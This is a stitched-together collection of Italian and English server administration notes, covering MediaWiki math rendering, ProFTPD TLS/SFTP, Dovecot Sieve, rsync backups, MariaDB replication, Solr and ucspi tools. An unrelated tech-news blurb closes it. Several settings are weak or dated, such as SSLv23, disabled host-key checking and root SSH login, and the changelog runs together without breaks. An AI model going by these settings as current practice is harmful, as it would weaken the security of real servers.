dovresti trovarlo in /usr/share/texmf/tex/latex/amsmath/amsmath.sty
Cambiare directory dove è installato mediawiki, editare LocalSettings.php e decommentare questo:
$wgUseTeX = true;
cd /path/to/htdocs/mediawiki/math
Prima di compilare, per evitare un parse error, usare il PATH assoluto ovunque all'interno di math/render.ml in questo modo:
let cmd_dvips tmpprefix = "/usr/share/texmf/bin/dvips -q -R -E " ^ tmpprefix ^ ".dvi -f >" ^ tmpprefix ^ ".ps" let cmd_latex tmpprefix = "/usr/share/texmf/bin/latex " ^ tmpprefix ^ ".tex >/dev/null" (* Putting -transparent white in converts arguments will sort-of give you transperancy *) let cmd_convert tmpprefix finalpath = "/usr/local/bin/convert -quality 100 -density 120 " ^ tmpprefix ^ ".ps " ^ finalpath ^ " >/dev/null 2>/tmp/wiki_convert_error" (* Putting -bg Transparent in dvipng's arguments will give full-alpha transparency *) (* Note that IE have problems with such PNGs and need an additional javascript snippet *) (* Putting -bg transparent in dvipng's arguments will give binary transparency *) let cmd_dvipng tmpprefix finalpath backcolor = "/usr/local/bin/dvipng -bg \'" ^ backcolor ^ "\' -gamma 1.5 -D 120 -T tight --strict " ^ tmpprefix ^ ".dvi -o " ^ finalpath ^ " >/dev/null 2>/tmp/wiki_dvipng_error"
Ora compiliamo
make
Provare a mettere dentro una pagina wiki qualcosa come
0
e cerchiamo di vedere cosa succede. Questo è il messaggio di errore più frequente:
Failed to parse (PNG conversion failed; check for correct installation of latex, dvips, gs, and convert)
Controlliamo se gli eseguibili sono nel path:
# ls -lH `which gs` `which latex` `which dvips` `which convert` -rwxr-xr-x 1 root root 5977916 2008-12-05 23:36 /usr/bin/gs* -rwxr-xr-x 1 root root 23410 2010-11-21 15:22 /usr/local/bin/convert* -rwxr-xr-x 1 root root 209308 2007-06-28 04:51 /usr/share/texmf/bin/dvips* -rwxr-xr-x 1 root root 1010984 2007-06-28 04:51 /usr/share/texmf/bin/latex*
Abilitiamo il log degli errori. Inserire una linea come questa in LocalSettings.php
$wgDebugLogFile = "/tmp/wiki.log";
Apriamo questo file e cerchiamo una riga come questa ;
TeX: ./math/texvc '/path/to/htdocs/mediawiki/images/tmp' '/path/to/htdocs/mediawiki/images/tmp' '0' 'UTF-8' 'transparent' TeX output: Ccfcd208495d565ef66e7dff9f98764da0 0 ---
Cerchiamo ora di eseguire il comando texvc dalla linea di comando come utente apache:
cd math sudo -u apache ./texvc '../images/tmp' '../images/tmp' '0' 'UTF-8' 'transparent'
a controlliamo il PNG nella cartella images/tmp. Se si ottiene ancora un parse error, si ricontrolli il path assoluto in math/render.ml, e si ricompili. E si rileggano le referenze indicate.
Ecco come ho installato mod_tls (ftpes) e mod_sftp in proftpd. I miei tentativi di farli convivere in due demoni separati sono tutti falliti, giacchè ho registrato errori nel trasferimento che sono spariti solo quando ho provato a caricare mod_tls o mod_sftp a turno.
Questi i miei test sulla velocità (per la verità un po' frettolosi). ftpes sembra un pochino più veloce in modalità upload:
ftpes
upload: circa 22.4 K/s
download: più di 800 K/s
sftp
upload circa 18.2 K/s
download: più di 800 K/s
./configure \
--prefix=/usr/local \
--without-pam --disable-auth-pam \
--enable-openssl \
--with-modules=mod_ratio:mod_readme:mod_sftp:mod_tls
ftpes.conf# common stuff goes here
Include /usr/local/etc/proftpd/proftpd.conf
<IfModule mod_tls.c>
TLSEngine on
PassivePorts 49152 65535
#MasqueradeAddress 012.345.678.901 # se il server e' dietro un firewall
TLSLog /var/log/proftpd/tls.log
TLSProtocol SSLv23
# Require protection on the control channel, but reject protection of the data channel
TLSRequired ctrl+!data
TLSRSACertificateFile /usr/local/etc/ssl/certs/proftpd.pem
TLSRSACertificateKeyFile /usr/local/etc/ssl/certs/proftpd.pem
TLSVerifyClient off
TLSRenegotiate none
</IfModule>
sftp.conf# common stuff
Include /usr/local/etc/proftpd/proftpd.conf
<IfModule mod_sftp.c>
SFTPEngine on
SFTPLog /var/log/proftpd/sftp.log
Port 22
SFTPHostKey /etc/ssh/ssh_host_rsa_key
SFTPHostKey /etc/ssh/ssh_host_dsa_key
SFTPCompression delayed
MaxLoginAttempts 6
</IfModule>
Infine avviare il demone richiamando il file di configurazione desiderato:
/usr/local/sbin/proftpd -c /usr/local/etc/proftpd/ftpes.conf # se si vuole ftpes /usr/local/sbin/proftpd -c /usr/local/etc/proftpd/sftp.conf # se si preferisce sftp
Non avviarli mai insieme.
proftpd.confServerType standalone
UseReverseDNS off
DeferWelcome off
Port 21
Umask 022
MaxInstances 30
User ftp
Group ftp
SystemLog /var/log/proftpd/proftpd.log
TransferLog /var/log/proftpd/xferlog
<Global>
<Directory /*>
AllowOverwrite on
</Directory>
</Global>
<VirtualHost 123.456.789.123>
ServerName "ProFTPD"
DefaultRoot ~/www
DefaultServer on
</VirtualHost>
#!/bin/sh
#
# /etc/rc.d/rc.proftpd
#
start() {
/usr/local/sbin/proftpd -c /usr/local/etc/proftpd/ftpes.conf
#-n -d 20 for backup
# /usr/local/sbin/proftpd -c /usr/local/etc/proftpd/sftp.conf
echo "Server started."
}
stop() {
/bin/killall proftpd
echo "Server stopped."
}
restart() {
stop
sleep 3
start
#/bin/killall -HUP proftpd
echo "Server restarted."
}
case "$1" in
'start')
start
;;
'stop')
stop
;;
'restart')
restart
;;
*)
echo "usage $0 start|stop|restart"
esac
Il progetto Pigeonhole fornisce il supporto Sieve a livello di plugin per il Local Delivery Agent (LDA) di Dovecot e anche per suo servizio LMTP. Il plugin è un interprete Sieve che filtra i messaggi in arrivo usando uno script scritto in linguaggio Sieve. Lo script Sieve è fornito dall'utente e, con il suo utilizzo, l'utente può personalizzare come i messaggi in arrivo sono trattati. I messaggi possono essere spediti a una cartella specifica, reindirizzati, rispediti al mittente, scartati, etc.
Il Server Dovecot Managesieve è un servizio per gestire la collezione di script Sieve dell'utente.
Se vuoi supportare i filtri per le email, devi gestire le Sieve rules per mezzo del server dovecot-pigeonhole. Quando crei un filtro con la tua webmail o il tuo client di posta, stai scrivendo uno script in linguaggio Sieve per personalizzare il modo in cui i tuoi messaggi saranno recapitati, vale a dire se saranno inoltrati a qualcun altro, scartati o salvati in delle cartelle particolari. Ma per fare questo Dovecot deve agire anche come un Local Delivery Agent al posto di vpopmail/vdelivermail, ovvero deve essere Dovecot a salvare i messaggi nella tua cartella Maildir. Questa guida cercherà di spiegare come raggiungere questo obiettivo.
spamhaus da connessioni fatte con DNS pubblico.- DKIM: added ERROR_FD=2 in control/filterargs to send error output of qmail-dkim in stderr when acting as a qmail-remote filter (Andreas Gerstlauer)qmail-dkim error reporting when signing outgoing messages (Andreas Gerstlauer)helodnscheck.cpp: qmail dir determined dinamicallyqmHandle: Add -x and -X parametr for remove email by To/Cc/Bcc (by Stetinac)qmail-spp greylisting plugin to solve a compilation break on rocky 8 (tx Shailendra Shukla)vpopmaild doesn't work when SHA-512 passwords have been enabled on vpopmail (--disable-sha512-passwords). All SQL queries have been updated.libev are now installed in /usr/local/include/libev (was /usr/local/include) to avoid conflicts with libevent (they both have an event.h header file). vusaged configure command was adjusted accordingly.--enable-sqmail-cdbsimscan now defines the maximum size of messages to be passed to spamassassin via control/simsizelimit filevpopmail e nuovo plugin qmailforward per Roundcube che vanno a risolvere diverse problematiche. Maggiori informazioni nella pagina dedicata..Debian, dove python2 non è presente (grazie a Gabriel Torres)convert-multilog program. In case you decide to stick with the original timestamp, then use the original convert-multilog. (diff)ExtractText notes have been revised and corrected by Gabriel Torrescmd_learn and the multi_driver driversqmailadmin: added the ezmlm-idx 7 compatibility patchDKIMKEY=/var/qmail/control/domainkeys/%/default" from the qmail rc config file, as DKIMKEY is actually ignored by dk-filter, which will look for the key in that location by default. Use DKIMSIGN instead to define yor domainkey location (thanks to Steffen for the hint)dovecot: the user query on the auth is now able to manage pop3/imap/webmail vpopmail limits (thanks to Arturo Blanco)vQadmin: combined patch released (more info inside the patch itself)qmail-remote.c that was causing the sending of an additional ehlo greeting (thanks to Cristoph Grover)qmailadmin: added a patch to log auth failures (thanks to Tony)fail2ban: added a filter against qmailadmin log failuresqmailadmin: added a patch to check for the password strenghtextra.h to record the Message-ID in the qmail-send's log (thanks to Simone for the hint). Look here for details.simscan has been improved with the jms patch. The work dir is mounted as a ramdisk nowfail2ban: qmail-smtp.conf filter updated to look for GREETDELAY linesdovecot because of security reasons (more info here)dovecot upgraded to v. 2.2.14dovecot-pigeonhole recompileddovecot upgraded to v. 2.2.14.rc1dovecot-pigeonhole upgraded to v. 0.4.3/usr/local/dovecot/etc/sieve/roundcube upgraded to v. 1.0.3.roundcube-auth filter to fail2banroundcube upgraded to v. 1.0.2. Fixed some errors in the relative page, as sometime the $config variable was still $rcmail_config as in the past, and all the config files are now merged into config.inc.php (thanks to Otto)clamav upgraded to v. 0.98.3roundcube upgraded to v. 1.0.1ezmlm-idx upgraded to v. 7.2.2qmailadmin recompiled against ezmlm-idx-7.2.2ezmlm-idx upgraded to v. 7.2.0ezmlm-idx, getting the program to be compliant with the Yahoo DMARC Policy Change. You have to recompile qmailadmin against ezmlm as well.qmail-maxrcpt patch, which allows you to set a limit on how many recipients are specifiedroundcube upgraded to v. 1.0.0qmail-smtpd-liberal-lf patch, which allows qmail-smtpd to accept messages that are terminated with a single \n instead of the required \r\n sequence. This should avoid some "read failed" reject.dovecot: upgraded to v. 2.1.10dovecot: upgraded to v. 2.1.9dovecot: upgraded to v. 2.1.6qmail-tap added to my combined patchdovecot: upgraded to v. 2.1.1auth_socket_path variable inside 10-mail.confdovecot: upgraded to v. 2.1.0dovecot-pigeonhole: upgraded to v.0.3.0esmtp-size patch added to my combined patchdoublebounce-trim patchRoundcube: updated to v. 0.7.1. All plugins have been updated to latest version as well.dnsbl.sorbs.org is not on my RBL examples anymore, as it proved to be a bad list. It's rejecting gmail's IPs and also confusing the IP of my own server as dynamic.update_tmprsadh to chown the .pem files to vpopmail to avoid hang-ups during the smtp conversation on port 587 caused by permission problems. qmail-remote.c which was not going into tls on authentication (thanks to Krzysztof Gajdemski)force-tls now quits if the starttls command is not provided when required (thanks to Jacekalex)Dovecot: upgraded to v. 2.0.15dovecot-pigeonhole: upgraded to v . 0.2.4RoundCube: upgraded to v. 0.6. All plugins have been updated to latest versionRoundCube: upgraded to v. 0.5.4 (security fix)force-tls patch allows the management of STARTTLS and CRAM-MD5 variables in the run file, so that there's no need to recompile each time anymore.qmail-inject-null-sender" patch by Stéphane Cottin, which addresses a bug on qmail-injectdovecot was updated to allow maildir++ (thanks to Nicolas) on files 90-quota.conf and 20-imap.confqmail on 64b platforms has been fixedrblsmtpd. Added a page about the greetdelay patch.ext-todo and big-todo patches, which adress the "silly qmail syndrome" on big servers.Spamassassin: updated to v. 3.3.2Roundcube: updated to v. 0.5.3 (2 important bug fixes)Dovecot: added a page concerning the purging of expired emails from Trash/JunkRoundCube: updated to v. 0.5.2. Updated almost all roundcube's plugin to latest version.qmail-rblchk---------
Questa pagina concerne il setup di alcuni filtri di rete che aiutano spamassassin a decidere cosa fare di un dato messaggio. Abilitando questi filtri, insieme al sistema di apprendimento bayesiano, migliorerà drasticamente le prestazioni di spamassassin nella lotta allo spamming.
vpopmaild del plugin password è nuovamente funzionante, ora che il problema è stato sistemato dal lato vpopmail (versione 5.6.7 in poi).
Le SURBL sono liste di siti web che appaiono nel corpo della posta indesiderata. Diversamente dalla maggior parte delle liste non sono liste di indirizzi IP.
I siti web che appaiono nei messaggi di posta indesiderata tendono ad essere più stabili rispetto agli indirizzi IP in rapido cambiamento dei botnet che sono soliti inviare la maggior parte di questi messaggi. Le liste di IP come zen.spamhaus.org possono essere usate in un primo stadio di filtraggio per aiutare a identificare da circa l'80% al 90% dei messaggi di posta indesiderata. Le liste SURBL possono contribuire a eliminare il restante 75% della posta indesiderata in un successivo stadio di filtraggio. Usate insieme alle liste di IP (RBL), le SURBL risultano un metodo molto efficace per identificare fino al 95% della posta indesiderata.
Rsync is a fast and extraordinarily versatile file copying tool. It can copy locally, to/from another host over any remote shell, or to/from a remote rsync daemon.
It offers a large number of options that control every aspect of its behavior and permit very flexible specification of the set of files to be copied. It is famous for its delta-transfer algorithm, which reduces the amount of data sent over the network by sending only the differences between the source files and the existing files in the destination. Rsync is widely used for backups and mirroring and as an improved copy command for everyday use.
Rsync finds files that need to be transferred using a "quick check" algorithm (by default) that looks for files that have changed in size or in last-modified time.
Any changes in the other preserved attributes (as requested by options) are made on the destination file directly when the quick check indicates that the file's data does not need to be updated.
I will show shortly how to:
Before we start, I'll call "local" the computer where the files have to be copied and "remote" the computer where those files are stored and where you have to listen for ssh connections.
To secure our data, we'll use rsync via a remote ssh connection, so there's no need to start rsync as a daemon, but sshd must be configured to accept connections without password and rsa-key authentication must be enabled in your /etc/ssh/sshd_config file:
PermitRootLogin without-password PubkeyAuthentication yes AllowUsers root
Here "root" is the only user who is allowed to connect via ssh. So the user "root" will be used at the ssh level and should not be confused with "rsync-user", which will be used to log-in to the rsync "module", site1 in the following example.
Log-in as "root" and create the config file /etc/rsync.conf.
# common stuff
motd file = /etc/rsyncd_motd
# the following in case you want to test rsync as daemon
log file = /var/log/rsyncd.log
pid file = /var/run/rsyncd.pid
lock file = /var/run/rsyncd.lock
[site1]
# this is the path of the files to backup
path = /home/ssh-user/path/where/site1/files/live
comment = site1 files
uid = root
gid = root
read only = yes
list = yes
auth users = rsync-user
secrets file = /root/rsyncd.scrt
# we don't have super user access
use chroot = false
[site2]
[....site2 stuff....]
uid and gid are the userID and the groupID under which file transfers will take place.
Before the transfer will start, you have to authenticate rsync with "auth user". Create the secret file ~/rsync.scrt which holds the user:password couples:
rsync-user:password rsync-user2:password2
Remove the 'r' flag to other users:
chmod o-r ~/rsync.scrt
Since we want to backup our files by means of a script and a cronjob, it's important that the remote ssh connection will not prompt for any password. We can achieve this by exchanging a ssh-key between client and server.
Create the private and public keys:
root@localhost:~# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa_remoteHost): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa_remoteHost. Your public key has been saved in /root/.ssh/id_rsa_remoteHost.pub. The key fingerprint is: a0:53:33:c5:d1:ea:4c:e2:a1:98:d9:ba:b0:e8:5f:90 root@localhost The key's randomart image is: +--[ RSA 2048]----+ | o++o | | o. . | | . .. | | .oo. | | E.O .S | | * * | |. . o . | |.o. . . | |+.oo | +-----------------+
Now you have to append the public key id_rsa_remoteHost.pub to the remote server's ~/.ssh/authorized_keys file. ssh-copy-id is a program which can do this for you:
root@localhost:~# ssh-copy-id -i ~/.ssh/id_rsa_remoteHost -p 12345 root@remoteHost
You will be prompted to enter the root password in order to copy the key.
Now test that the connection is allowed with no password:
root@localhost:~# ssh -p 12345 -l root -i /root/.ssh/id_rsa_remoteHost <remoteHost> Last login: Mon Sep 2 16:04:57 2013 from localhost Linux 2.6.32.10-vs2.3.0.36.29.2-smp. root@remotehost:~#
You can disable the access with password for the user root in your /etc/ssh/sshd_config:
PermitRootLogin prohibit-password
Now we are ready to create our backup shell-script as /usr/local/bin/rsync_backup.sh:
#!/bin/sh
/usr/bin/rsync \
-avz --exclude "*~" --delete-after \
-e "ssh -p 12345 -l root -i /root/.ssh/id_rsa_remoteHost" \
--password-file /root/remoteHost_rsync_pwd \
rsync-user1@::site1 \
/local/destination/path
Remember to give the flag +x to that file:
chmod +x /usr/local/bin/rsync_backup.sh
The password file /root/remoteHost_rsync_pwd holds the password of the rsync connection; in this way our shell-script will not receive a password prompt when it connects. It should be stored in a safe place and priviledges must be given only to the root user. It will contain just the password string.
Maybe the line
-avz --exclude "*~" \
deserves some description, but you are invited to refer to the man page for more details.
If you are wondering if the above method of using rsync is suitable for the vpopmail maildirs as well, the answer is yes, but with some adjustments. This is what I have in my backup scripts:
rsync -a \
--stats --delete-after --delete-excluded --numeric-ids --partial \
--exclude=Maildir/tmp/ \
--exclude=Maildir/*/tmp/ \
--exclude=dovecot* \
--exclude=*.lock \
--exclude=*.lock.* \
--exclude=/cache/ \
--exclude=*.qmail \
--exclude=*.qmails \
-e "ssh -i /root/.ssh/id_ed25519 -o StrictHostKeyChecking=no" \
root@${MAIL_IP}:/home/vpopmail/domains/ /home/backup/backup-domains/ \
>> "$LOGFILE" 2>&1
As you can see, I'm excluding the dovecot indexes and all the Maildirs' tmp dirs. This avoids transferring constantly changing temporary or volatile data, reduce the risk of inconsistencies if the backup is restored to a server with a different version of dovecot and improve synchronization performance by avoiding large amounts of non-critical files.
--stats prints statistics of the transfer in the log file.
--delete-after deletes files on the destination server only after the transfer is complete. If the transfer is interrupted midway, you don't immediately lose files on the backup.
--delete-excluded deletes from the backup everything that is no longer included in the sync, even if you had voluntarily excluded it.
--numeric-ids forces rsync to use numeric UIDs and GIDs instead of user and group names. This avoids problems if users on the backup server have different names than on the source server.
--partial Allows partially transferred files to be kept if the transfer is interrupted. With --partial, the file remains, and rsync can resume where it left off next time, saving time and bandwidth.
You can have a quick connection to the remote Host if you setup a ~/.ssh/config file as follow
Host MyHost HostName remoteHost.net User ssh-user Port 12345 IdentityFile ~/.ssh/id_rsa_remoteHost
and connecting as
> ssh MyHost Enter passphrase for key '/home/ssh-user/.ssh/id_rsa_remoteHost': Last login: Mon Sep 2 16:04:57 2013 from localhost Linux 2.6.32.10-vs2.3.0.36.29.2-smp. ssh-user@remotehost:~#
At this point it is convenient to disable root remote access setting /etc/ssh/sshd_config as follow:
PermitRootLogin without-password AllowUsers ssh-user PubkeyAuthentication yes
MariaDB uses asynchronous replication based on binary logs (binlog). Master (source) writes changes to the binary log, slave (replica) reads the binlog from the master and replays events locally. Replication is one-way by default (master to slave).
Configure MariaDB by editing /etc/my.cnf.d/mariadb-server.cnf
[mysqld] server-id=1 log_bin=binlog binlog_format=ROW
bind-address = 0.0.0.0
bind-address = 0.0.0.0 assures that the server is accessible from the outnet. Check with netstat
netstat -plunt|grep 3306
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 417359/mariadbd
Restart MariaDB, then check the binary log file name and the binary log position:
MariaDB [(none)]> SHOW MASTER STATUS;
+---------------+----------+--------------+------------------+
| File | Position | Binlog_Do_DB | Binlog_Ignore_DB |
+---------------+----------+--------------+------------------+
| binlog.000001 | 14446 | | |
+---------------+----------+--------------+------------------+
1 row in set (0.000 sec)
Create the user for the replication from the slave:
CREATE USER 'replica'@'SlaveIP%' IDENTIFIED BY 'password'; GRANT REPLICATION SLAVE ON *.* TO 'replica'@'SlaveIP'; FLUSH PRIVILEGES;
Dump the databases you want to backup (vpopmail, roundcubemail and spamassassin in my example):
mysqldump -u root -p --databases vpopmail roundcubemail spamassassin --single-transaction --master-data=2 > dump.sql
Prepare the server by editing /etc/my.cnf.d/mariadb-server.cnf. Assign a unique id:
# replica server-id=2 # unique id log_bin=binlog # to revert master - slave read_only=ON # cannot alter the database # databases to replicate (it will read only these db from log) replicate-do-db=vpopmail replicate-do-db=roundcubemail replicate-do-db=spamassassin
Log into MariaDB, stop the current slave (if it exists) and drop the databases to be cloned;
STOP SLAVE; RESET SLAVE ALL;
DROP DATABASE IF EXISTS vpopmail;
DROP DATABASE IF EXISTS spamassassin;
DROP DATABASE IF EXISTS roundcubemail;
Use scp to copy the dump you have done earlier (here I am connecting via secure key):
scp -i '/root/.ssh/ed25519' root@MasterIP:/root/dump.sql .
Import the dump:
mysql -u root -p < dump.sql
Open the dump.sql file and identify the line holding the log file and the log position:
-- CHANGE MASTER TO MASTER_LOG_FILE='binlog.000001', MASTER_LOG_POS=65327;
The same thing can be achieved by using grep
grep "CHANGE MASTER TO" dump.sql -- CHANGE MASTER TO MASTER_LOG_FILE='binlog.000001', MASTER_LOG_POS=65327;
Enter the slave server and configure the master:
CHANGE MASTER TO MASTER_HOST='MasterIP', MASTER_USER='replica', MASTER_PASSWORD='replicaPWD', MASTER_LOG_FILE='binlog.000001', MASTER_LOG_POS=65327;
Then start the slave on MariaDB and verify its status:
MariaDB [(none)]> START SLAVE;
Query OK, 0 rows affected (0.000 sec)
MariaDB [(none)]> SHOW SLAVE STATUS\G
*************************** 1. row ***************************
Slave_IO_State: Waiting for master to send event
Master_Host: MasterIP
Master_User: replica
Master_Port: 3306
Connect_Retry: 60
Master_Log_File: binlog.000001
Read_Master_Log_Pos: 719355
Relay_Log_File: mariadb-relay-bin.000003
Relay_Log_Pos: 357109
Relay_Master_Log_File: binlog.000001
Slave_IO_Running: Yes
Slave_SQL_Running: Yes
Replicate_Do_DB:
Replicate_Ignore_DB:
Replicate_Do_Table:
Replicate_Ignore_Table:
Replicate_Wild_Do_Table:
Replicate_Wild_Ignore_Table:
Last_Errno: 0
Last_Error:
Skip_Counter: 0
Exec_Master_Log_Pos: 719355
Relay_Log_Space: 357420
Until_Condition: None
Until_Log_File:
Until_Log_Pos: 0
Master_SSL_Allowed: No
Master_SSL_CA_File:
Master_SSL_CA_Path:
Master_SSL_Cert:
Master_SSL_Cipher:
Master_SSL_Key:
Seconds_Behind_Master: 0
Master_SSL_Verify_Server_Cert: No
Last_IO_Errno: 0
Last_IO_Error:
Last_SQL_Errno: 0
Last_SQL_Error:
Replicate_Ignore_Server_Ids:
Master_Server_Id: 1
Master_SSL_Crl:
Master_SSL_Crlpath:
Using_Gtid: No
Gtid_IO_Pos:
Replicate_Do_Domain_Ids:
Replicate_Ignore_Domain_Ids:
Parallel_Mode: optimistic
SQL_Delay: 0
SQL_Remaining_Delay: NULL
Slave_SQL_Running_State: Slave has read all relay log; waiting for more updates
Slave_DDL_Groups: 0
Slave_Non_Transactional_Groups: 90
Slave_Transactional_Groups: 980
Replicate_Rewrite_DB:
1 row in set (0.000 sec)
If Slave_IO_Running: Yes and Slave_SQL_Running: Yes it's ok. Seconds_Behind_Master inform us if the server is aligned.
You can insert data into Master and check if they are replicated no Slave.
Connect to mariadb from command line and check the slave status and that the slave is synced with master (Seconds_Behind_Master: 0):
SHOW SLAVE STATUS\G
Check that:
Slave_IO_Running: Yes Slave_SQL_Running: Yes Seconds_Behind_Master: 0
If slave is perfectly synced with master stop the replica
STOP SLAVE; RESET SLAVE ALL;
Set the mariadb server writable
SET GLOBAL read_only=OFF;
Exit from MariaDB command line and modify the config file so that read_only is commented out.
[mysqld] # replica server-id=2 log_bin=binlog #read_only=ON replicate-do-db=vpopmail replicate-do-db=roundcubemail
Restart the server. Now the database server is in production.
Solr è un server di indicizzazione basato su Apache Lucene. Dovecot communica con esso attraverso delle query HTTP/XML. Il server di indicizzazione consente di fare ricerche di testo in modo veloce nelle mail, compreso il corpo dei messaggi.
SOLR_OPTS="$SOLR_OPTS -Dsolr.config.lib.enabled=true" in solr.in.shDovecot ha recentemente rilasciato i file schema aggiornati alla versione 9, alternativi a quelli che si trovano quiPrima di ogni cosa controllare che la propria versione di java sia almeno la 11.
Scaricare Solr:
SOLR_VER=9.10.1
wget https://www.apache.org/dyn/closer.lua/solr/solr/${SOLR_VER}/solr-${SOLR_VER}.tgz?action=download -O solr-${SOLR_VER}.tgz
Arrestare quindi il server Solr e lanciare l'aggiornamento con le opzioni -f (aggiornamento) e -n (non lanciare do not start the server when finished) options:
tar xzf solr-${SOLR_VER}.tgz solr-${SOLR_VER}/bin/install_solr_service.sh --strip-components=2
sudo bash ./install_solr_service.sh solr-${SOLR_VER}.tgz -f -n
Gli utenti Slackware invece dovranno procedere diversamente:
wget https://notes.sagredo.eu/files/qmail/solr/install_solr_slackware.sh
chmod +x install_solr_slackware.sh
./install_solr_slackware.sh solr-${SOLR_VER}.tgz -f -n
Scaricare e installare il nuovo schema e il file di configurazione per Dovecot
cd /var/solr/data/dovecot/conf rm -f schema.xml managed-schema.xml solrconfig.xml wget https://raw.githubusercontent.com/dovecot/core/refs/heads/main/doc/solr-schema-9.xml -O schema.xml wget https://raw.githubusercontent.com/dovecot/core/refs/heads/main/doc/solr-config-9.xml -O solrconfig.xml chown solr:solr solrconfig.xml schema.xml
Il nuovo file di configurazione sostituisce LRUCache con CaffeineCache e cambia la locazione delle librerie .jar (diff).
Riconfigurare il proprio /etc/default/solr.in.sh file, dato che molte opzioni sono cambiate radicalmente, quindi riavviare Solr.
Dobbiamo abilitare le librerie di configurazione come descritto qui per risolvere un errore che compare dalla versione 9.8.0 quando con lo scjema di Dovecot. Aggiungere questa riga al file /etc/default/solr.in.sh:
SOLR_OPTS="$SOLR_OPTS -Dsolr.config.lib.enabled=true"
Infine aggiornare gli indici (editare lo script apposito per inserire la propria password di Dovecot)
wget https://notes.sagredo.eu/files/qmail/solr/solr_rescan_index.sh chmod +x solr_rescan_index.sh chown root:root solr_rescan_index.sh chmod o-wrx solr_rescan_index.sh ./solr_rescan_index.sh Stopping Dovecot . <?xml version="1.0" encoding="UTF-8"?> <response> <lst name="responseHeader"> <int name="status">0</int> <int name="QTime">20</int> </lst> </response> Starting Dovecot.
Lo script non deve restituire errori (status=0). Se invece si ottengono degli errori è necessario ricontrollare le autorizzazioni di sicurezza e le credenziali dell'utente dovecot di Solr.
fehQlibs-30Le fehQlibs sono librerie C aggiuntive sviluppate da Erwin Hoffmann. Sono un prerequisito di ucspi-tcp6 e di ucspi-ssl.
Installare come segue in /usr/local:
FEQLIBS_VER=30
cd /usr/local
wget https://www.fehcom.de/ipnet/fehQlibs/fehQlibs-${FEQLIBS_VER}.tgz
tar xzf fehQlibs-${FEQLIBS_VER}.tgz
chown -R root:root fehQlibs-${FEQLIBS_VER}
cd fehQlibs-${FEQLIBS_VER}
Cambiare la cartella di installazione modificando il file conf-build come segue
LIBDIR=/usr/local/lib HDRDIR=/usr/local/include
Compilare e installare
make -C src
make -C src shared
make -C src install
cd ..
rm qlibs
ln -s fehQlibs-${FEQLIBS_VER} qlibs
Le qlibs dovranno essere trovate al momento della compilazione di ucspi-tcp6, quindi dobbiamo aggiungerle al file /etc/ld.so.conf:
echo "/usr/local/qlibs" >> /etc/ld.so.conf ldconfig
In genere nei sistemi Unix si può lanciare questo comando per ottenere lo stesso risultato e linkare le librerie qlib:
ldconfig -m /usr/local/qlibs
TxRep was designed as an enhanced replacement of the AutoWhitelist plugin. TxRep, just like AWL, tracks scores of messages previously received, and adjusts the current message score, either by boosting messages from senders who send ham or penalizing senders who have sent spam previously. This not only treats some senders as if they were whitelisted but also treats spammers as if they were blacklisted. Each message from a particular sender adjusts the historical total score which can change them from a spammer if they send non-spam messages. Senders who are considered non-spammers can become treated as spammers if they send messages which appear to be spam. Simpler told TxRep is a score averaging system. It keeps track of the historical average of a sender, and pushes any subsequent mail towards that average.
The Bayesian classifier in Spamassassin tries to identify spam by looking at what are called tokens; words or short character sequences that are commonly found in spam or ham. If I've handed 100 messages to sa-learn that have the phrase penis enlargement and told it that those are all spam, when the 101st message comes in with the words penis and enlargment, the Bayesian classifier will be pretty sure that the new message is spam and will increase the spam score of that message.
In pratica Bayes è un classificatore statistico: guarda i token (parole, header, URL, ecc.) e calcola la probabilità che il messaggio sia spam senza interessarsi di chi manda, ma solo del contenuto.
Invece TxRep tiene traccia della reputazione del mittente (indirizzo email + IP).
ucspi-tcp6 è una derivaziorne del programma di Daniel Bernsteins ucspi-tcp 0.88, che aggiunge, tra le altre cose, le funzionalità ipv6 al programma originale ucspi-tcp. tcpserver e tcpclient sono strumenti di facile utilizzo dalla linea di comando per costruire applicazioni client-server TCP.
A partire dalla versione 1.13.05 è richiesto il pacchetto mandoc sia per ucspi-tcp6 che per ucspi-ssl. Gli utenti Slackware possono trovare il pacchetto su slackbuild.org.
ucspi-tcp6TCP6_VER=1.13.07
cd /var/qmail/
wget https://www.fehcom.de/ipnet/ucspi-tcp6/ucspi-tcp6-${TCP6_VER}.tgz
tar xzf ucspi-tcp6-${TCP6_VER}.tgz
cd net/ucspi-tcp6/ucspi-tcp6-${TCP6_VER}/
./package/install
L'utilizzo di tcpserver, per quanto riguarda l'IPv4, è del tutto simile a quello del programma originale di Bernstein.
In caso di upgrade di ucspi-tcp6 è necessario uccidere i processi tcpserver e riavviare qmail (qmailctl sarà installato dopo):
qmailctl reboot
sslserver, sslclient, e sslhandle sono strumenti da utilizzare dalla linea di comando per costruire applicazioni SSL client-server.
sslserver ascolta connessioni su IPv6 e/o IPv4, e lancia un programma per ogni connessione accettata. L'ambiente del programma include variabili che mantengono l'host name locale e remoto, l'indirizzo IP, e i numeri di porta.
sslclient richiede una connessione o a tramite IPv6 o IPv4 TCP sockets, e lancia un programma. L'ambiente del programma environment include le stesse variabili di sslserver.
Mediante sslserver è possibile accettare connessioni sicure per spedire la posta attraverso la porta 465 previa autenticazione.
Abbiamo già installato le fehQlibs, che sono delle librerie C supplementari necessarie anche per ucspi-ssl.
A partire dalla versione 1.13.05 è richiesto il pacchetto mandoc sia per ucspi-tcp6 che per ucspi-ssl. Gli utenti Slackware possono trovare il pacchetto su slackbuild.org.
UCSPISSL_VER=0.13.07
cd /var/qmail
wget https://www.fehcom.de/ipnet/ucspi-ssl/ucspi-ssl-${UCSPISSL_VER}.tgz
tar xzf ucspi-ssl-${UCSPISSL_VER}.tgz
cd host/superscript.com/net/ucspi-ssl-${UCSPISSL_VER}
./package/install
La configurazione degli script supervise per qmail-smtps è all'interno della pagina riguardante la configurazione.
After backlash from the Linux community, California may be backing off on its promise to force all operating systems to verify age, but one platform may still have to comply.
Steam Deck price rises point toward high prices for the new Valve hardware, Lenovo puts its name to a cheap retro handheld and regrets it, Wikipedia management seems to be acting like a typical big tech company and the workers are organising, Bambu pisses off its 3D printer customers and Joe got given a free unrelated 3D printer, and we don’t believe that the Raspberry Pi 6 will arrive as late as 2028.
News
Steam Deck back in stock, with updated pricing
The golden age of handheld gaming is already over [archived]
Sellers circumvent Lenovo’s retro handheld ban with cheap wholesale storefronts
Big Tech’s Anti-Labor Playbook Has Come for Wikipedia
